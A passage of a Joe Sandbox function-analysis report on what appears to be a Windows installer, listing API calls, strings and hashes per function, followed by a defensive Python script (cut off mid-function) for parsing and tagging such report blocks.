                                                                            • Instruction ID: 6afc82d78c4e6d9526045151df1525e73fa02dd6a17213aad7cd5d98e3565ae3
                                                                            • Opcode Fuzzy Hash: 38f21b6de1c3782b685d2c0af9f28be416f44e06874f6bb5035634e2dcc68750
                                                                            • Instruction Fuzzy Hash: BC418F70A04608AFDB15DFA5DD81FAEB7F9EB08710F1040B6F904E7392D6789E44CA68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00454EE5,?,?,00000031,?), ref: 00454DA8
                                                                            • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00454DAE
                                                                            • LoadTypeLib.OLEAUT32(00000000,?), ref: 00454DFB
                                                                              • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                            • API String ID: 1914119943-2711329623
                                                                            • Opcode ID: 10a434107409ef4988e99fdf2a40fccf44bc0ac8e46ad230c6e42fc229f0afa3
                                                                            • Instruction ID: 2bf04720efcd21e73fda0c956b895e5846be94a4420347b52386e37effde86e0
                                                                            • Opcode Fuzzy Hash: 10a434107409ef4988e99fdf2a40fccf44bc0ac8e46ad230c6e42fc229f0afa3
                                                                            • Instruction Fuzzy Hash: 1F319271A00604AFC701EFAACC52D5BB7BEFBC87097118466FD04DB652DA38DD44C628
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E379,?,?,00000001,00000000,?,?,00000001,00000000,00000002,00000000,0047B8F6), ref: 0042E29D
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E2A3
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E379,?,?,00000001,00000000,?,?,00000001), ref: 0042E2F1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressCloseHandleModuleProc
                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                            • API String ID: 4190037839-2401316094
                                                                            • Opcode ID: d045098ef34200c22202e99a4145b28dd45ddec826700b532d9b98b58edb8012
                                                                            • Instruction ID: 4ee60a07781906a8a0ffae9c6e5e5ebe2969662c9c3675aa1be84450fad3e8b0
                                                                            • Opcode Fuzzy Hash: d045098ef34200c22202e99a4145b28dd45ddec826700b532d9b98b58edb8012
                                                                            • Instruction Fuzzy Hash: 87214630B00215EBDB00EAA7DC51B9F77A9EB04315FD04477A900E7281DB7CAE05DB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RectVisible.GDI32(?,?), ref: 00416D83
                                                                            • SaveDC.GDI32(?), ref: 00416D97
                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416DBA
                                                                            • RestoreDC.GDI32(?,?), ref: 00416DD5
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416E55
                                                                            • FrameRect.USER32(?,?,?), ref: 00416E88
                                                                            • DeleteObject.GDI32(?), ref: 00416E92
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416EA2
                                                                            • FrameRect.USER32(?,?,?), ref: 00416ED5
                                                                            • DeleteObject.GDI32(?), ref: 00416EDF
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                            • String ID:
                                                                            • API String ID: 375863564-0
                                                                            • Opcode ID: 1df63080f967596adf43ebdb9d67fdccf49ab23e9096a25037667f73de04663f
                                                                            • Instruction ID: 01d81588b69ff1f480347e903aed9c185fc6c29f227380d1fa6610f1b9ad60dd
                                                                            • Opcode Fuzzy Hash: 1df63080f967596adf43ebdb9d67fdccf49ab23e9096a25037667f73de04663f
                                                                            • Instruction Fuzzy Hash: A8513C712086449BDB50EF69C8C0B9B77E8EF48314F15566AFD48CB286C738EC81CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                            • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                            • String ID:
                                                                            • API String ID: 1694776339-0
                                                                            • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                            • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                            • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                            • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 004221A3
                                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 004221C1
                                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221CE
                                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221DB
                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221E8
                                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 004221F5
                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422202
                                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042220F
                                                                            • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 0042222D
                                                                            • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00422249
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$EnableItem$System
                                                                            • String ID:
                                                                            • API String ID: 3985193851-0
                                                                            • Opcode ID: b8b89d1ef914de5f4b700308a8a2e79f02337078b5e803e02db0f43c2e7e4a28
                                                                            • Instruction ID: e98f5eede000e984507cfb68b46ad6efe0a5c83d9602cc3651cf502f29ecaa29
                                                                            • Opcode Fuzzy Hash: b8b89d1ef914de5f4b700308a8a2e79f02337078b5e803e02db0f43c2e7e4a28
                                                                            • Instruction Fuzzy Hash: 23213370380744BAE720D725DD8BF9B7BD89B04708F0444A5BA487F2D7C6F9AE40869C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(10000000), ref: 0047BFA8
                                                                            • FreeLibrary.KERNEL32(022E0000), ref: 0047BFBC
                                                                            • SendNotifyMessageA.USER32(00020446,00000496,00002710,00000000), ref: 0047C021
                                                                            Strings
                                                                            • Restarting Windows., xrefs: 0047BFFC
                                                                            • Deinitializing Setup., xrefs: 0047BE1E
                                                                            • GetCustomSetupExitCode, xrefs: 0047BE5D
                                                                            • Not restarting Windows because Setup is being run from the debugger., xrefs: 0047BFDD
                                                                            • DeinitializeSetup, xrefs: 0047BEB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary$MessageNotifySend
                                                                            • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                            • API String ID: 3817813901-1884538726
                                                                            • Opcode ID: 99f915d00c11ec276e19136852c787799f8d5699edd2cc415edbfead57b4d6dc
                                                                            • Instruction ID: 5aabc136c0a50bbda2486703200ad66b9283696e7d5460ba133d2cc504fcf864
                                                                            • Opcode Fuzzy Hash: 99f915d00c11ec276e19136852c787799f8d5699edd2cc415edbfead57b4d6dc
                                                                            • Instruction Fuzzy Hash: 2251BF30600A019FD712DB69E899B9A77A4EB59704F60C4BBF808C73A1DB789C45CF9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00457770: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004578A2,00000000,004579EF,?,00000000,00000000,00000000), ref: 004577BD
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004579EF,?,00000000,00000000,00000000), ref: 004578FE
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004579EF,?,00000000,00000000,00000000), ref: 00457964
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            Strings
                                                                            • v2.0.50727, xrefs: 004578F0
                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 004578B2
                                                                            • .NET Framework not found, xrefs: 004579B2
                                                                            • .NET Framework version %s not found, xrefs: 0045799E
                                                                            • v1.1.4322, xrefs: 00457956
                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00457918
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Close$Open
                                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$v1.1.4322$v2.0.50727
                                                                            • API String ID: 2976201327-1070292914
                                                                            • Opcode ID: 459b95da5429d7d35dab5d0c6b2d4d5a6c6ec011e70205ce483ffcd3ec2b4037
                                                                            • Instruction ID: c0ad98b253435a04450e4f0d412c4263007441af3f925dfe38269f217dae66aa
                                                                            • Opcode Fuzzy Hash: 459b95da5429d7d35dab5d0c6b2d4d5a6c6ec011e70205ce483ffcd3ec2b4037
                                                                            • Instruction Fuzzy Hash: 2741EC70A081465FDB00DFA5E851BDE77B5EB49305F54447BE400DB243D7799A0ECB68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SHGetMalloc.SHELL32(?), ref: 0045DC5B
                                                                            • GetActiveWindow.USER32 ref: 0045DCBF
                                                                            • CoInitialize.OLE32(00000000), ref: 0045DCD3
                                                                            • SHBrowseForFolder.SHELL32(?), ref: 0045DCEA
                                                                            • 76C9D120.OLE32(0045DD2B,00000000,?,?,?,?,?,00000000,0045DDAF), ref: 0045DCFF
                                                                            • SetActiveWindow.USER32(?,0045DD2B,00000000,?,?,?,?,?,00000000,0045DDAF), ref: 0045DD15
                                                                            • SetActiveWindow.USER32(?,?,0045DD2B,00000000,?,?,?,?,?,00000000,0045DDAF), ref: 0045DD1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ActiveWindow$BrowseD120FolderInitializeMalloc
                                                                            • String ID: A
                                                                            • API String ID: 2698730301-3554254475
                                                                            • Opcode ID: 35e8b70af3f9a11701dc89ad6a7dc5067c9e57c40fd942637c72eceddb9e2f2f
                                                                            • Instruction ID: cf29a6196fb2df87458bc734ae7ceebd32c59f4afd20480d407c1097e6e56ab9
                                                                            • Opcode Fuzzy Hash: 35e8b70af3f9a11701dc89ad6a7dc5067c9e57c40fd942637c72eceddb9e2f2f
                                                                            • Instruction Fuzzy Hash: E0311271D00208AFDB11EFB6D886A9EBBF8EF09304F51447AF804E7252D7785A44CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetSystemMetrics.USER32(0000000E), ref: 00418BE0
                                                                            • GetSystemMetrics.USER32(0000000D), ref: 00418BE8
                                                                            • 6F542980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418BEE
                                                                              • Part of subcall function 00409920: 6F53C400.COMCTL32((FI,000000FF,00000000,00418C1C,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00409924
                                                                            • 6F5ACB00.COMCTL32((FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C3E
                                                                            • 6F5AC740.COMCTL32(00000000,?,(FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418C49
                                                                            • 6F5ACB00.COMCTL32((FI,00000001,?,?,00000000,?,(FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000), ref: 00418C5C
                                                                            • 6F540860.COMCTL32((FI,00418C7F,?,00000000,?,(FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E), ref: 00418C72
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$C400C740F540860F542980
                                                                            • String ID: (FI
                                                                            • API String ID: 3392676452-1614602237
                                                                            • Opcode ID: a62bb13e1bd7fa3b9c7351fff79d2a2ecdea0cb757dbaccc16c00855b604fece
                                                                            • Instruction ID: 8ee50baf9f6b03e6802097753a63af578849a2694d0e9ed51cb84c1dfac16794
                                                                            • Opcode Fuzzy Hash: a62bb13e1bd7fa3b9c7351fff79d2a2ecdea0cb757dbaccc16c00855b604fece
                                                                            • Instruction Fuzzy Hash: B51136B5744204BADB10EBF5DC82F5E73B8DB49704F50406AB604E72D2E6799D408768
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(022E0000,inflateInit_), ref: 0045B5E1
                                                                            • GetProcAddress.KERNEL32(022E0000,inflate), ref: 0045B5F1
                                                                            • GetProcAddress.KERNEL32(022E0000,inflateEnd), ref: 0045B601
                                                                            • GetProcAddress.KERNEL32(022E0000,inflateReset), ref: 0045B611
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                            • API String ID: 190572456-3516654456
                                                                            • Opcode ID: 0244c5342f474d5f0d92f6c90a29f5f03fc9f5158d69ccc7f6593d0f4fc18990
                                                                            • Instruction ID: fd82cc1e756c275edc3707c7f07377cec179b09f743abcb6ba5c01fe1bd4d686
                                                                            • Opcode Fuzzy Hash: 0244c5342f474d5f0d92f6c90a29f5f03fc9f5158d69ccc7f6593d0f4fc18990
                                                                            • Instruction Fuzzy Hash: E5012CB0500746DEEB14DF72EC90B2736A5E7E870AF14803BA845562AADB7C044BCE5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041A929
                                                                            • 73A14D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A963
                                                                            • SetBkColor.GDI32(?,?), ref: 0041A978
                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041A9C2
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041A9CD
                                                                            • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041A9DD
                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AA1C
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AA26
                                                                            • SetBkColor.GDI32(00000000,?), ref: 0041AA33
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Color$StretchText
                                                                            • String ID:
                                                                            • API String ID: 2984075790-0
                                                                            • Opcode ID: 96642afef6407557abda8c1cb6f38d9a010b32914ce32b6cc36c1a5a9073b633
                                                                            • Instruction ID: 5791d4d8e51028595b948ed591e6ff6c43c29dc3dd821c9bc5bae20fa008be23
                                                                            • Opcode Fuzzy Hash: 96642afef6407557abda8c1cb6f38d9a010b32914ce32b6cc36c1a5a9073b633
                                                                            • Instruction Fuzzy Hash: F661E5B5A00104EFCB40EFA9D985E9AB7F8AF0D314B10816AF518DB252C734ED41CF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00456130,?, /s ",?,regsvr32.exe",?,00456130), ref: 004560A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDirectoryHandleSystem
                                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                            • API String ID: 2051275411-1862435767
                                                                            • Opcode ID: 1ae4d1559c225658233d195df01a5ac76f1bcba5e74ca4c9dacf9a152af87d32
                                                                            • Instruction ID: 1b1342de70b8511bd96e109cd760b193c6bc6e2768a22c9f7c7172ce61990ba6
                                                                            • Opcode Fuzzy Hash: 1ae4d1559c225658233d195df01a5ac76f1bcba5e74ca4c9dacf9a152af87d32
                                                                            • Instruction Fuzzy Hash: 95411970E007085BDB10EFE5C842B9DB7F9AF44305F91407BA904BB297D7789A098B59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044CA3D
                                                                            • GetSysColor.USER32(00000014), ref: 0044CA44
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044CA5C
                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA85
                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA8F
                                                                            • GetSysColor.USER32(00000010), ref: 0044CA96
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044CAAE
                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAD7
                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CB02
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Text$Color$Draw$OffsetRect
                                                                            • String ID:
                                                                            • API String ID: 1005981011-0
                                                                            • Opcode ID: 9e5c892965933efe92cb1196a4cf079dced8b69e9bfa1b103b040bba4ee2a0e0
                                                                            • Instruction ID: 79e5725ec2e75caab84353522faa1c644d19f3f9c4a46f72b84b259f8bdbd55b
                                                                            • Opcode Fuzzy Hash: 9e5c892965933efe92cb1196a4cf079dced8b69e9bfa1b103b040bba4ee2a0e0
                                                                            • Instruction Fuzzy Hash: 3921EFB42015047FC710FB2ACC8AE8BBBECDF19319B01457A7918EB393C678DD408669
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%
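
The function blocks in this part of the report share one layout: an APIs list ("Name.MODULE(args), ref: addr", with "Part of subcall function X:" marking calls made by callees), a Strings list ("text, xrefs: addr"), the memory-dump source, and the similarity hashes. Reading hundreds of these by eye is slow, so the following script, an added example that is not part of the Joe Sandbox report, parses that layout and applies a few triage heuristics to each function: export names handed to GetProcAddress (the inflate* resolution above), registry paths passed to RegOpenKey*, and strings or arguments that mention regsvr32, a debugger check, a reboot or a .NET Framework lookup. The sample text is constructed from lines of this report and trimmed; the tag names, the TEXT_RULES table and the "first own call site" convention are this example's own choices, not Joe Sandbox fields.

```python
"""Triage helper for Joe Sandbox function-analysis blocks (added example, not report output)."""
import re
from dataclasses import dataclass, field

# "Name.MODULE(args), ref: addr", optionally prefixed "Part of subcall function X: "
API_RE = re.compile(r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?(?P<name>\S+?)"
                    r"\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-F]+)$")
HEX_ARG_RE = re.compile(r"^[0-9A-F]{8}$")        # plain 32-bit values; anything else is symbolic
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
# Substring heuristics over strings and API arguments; rule and tag names are this example's own.
TEXT_RULES = (("debugger", "debugger-aware"), ("restarting windows", "may-reboot"),
              (".net framework", "checks-dotnet"), ("regsvr32", "spawns-regsvr32"))

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)     # dicts: caller, name, module, args, ref
    strings: list = field(default_factory=list)  # (text, xref) pairs
    meta: dict = field(default_factory=dict)     # "Opcode ID", "Instruction Fuzzy Hash", ...

def parse_blocks(text):
    """Split report text into FunctionBlocks; each 'APIs' header starts a new block."""
    blocks, block, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            block, section = FunctionBlock(), line
            blocks.append(block)
        elif block is None or not line:
            continue
        elif line in SECTIONS:
            section = line
        elif line.startswith("•"):               # other lines, e.g. "Uniqueness Score", are skipped
            entry = line.lstrip("• ").strip()
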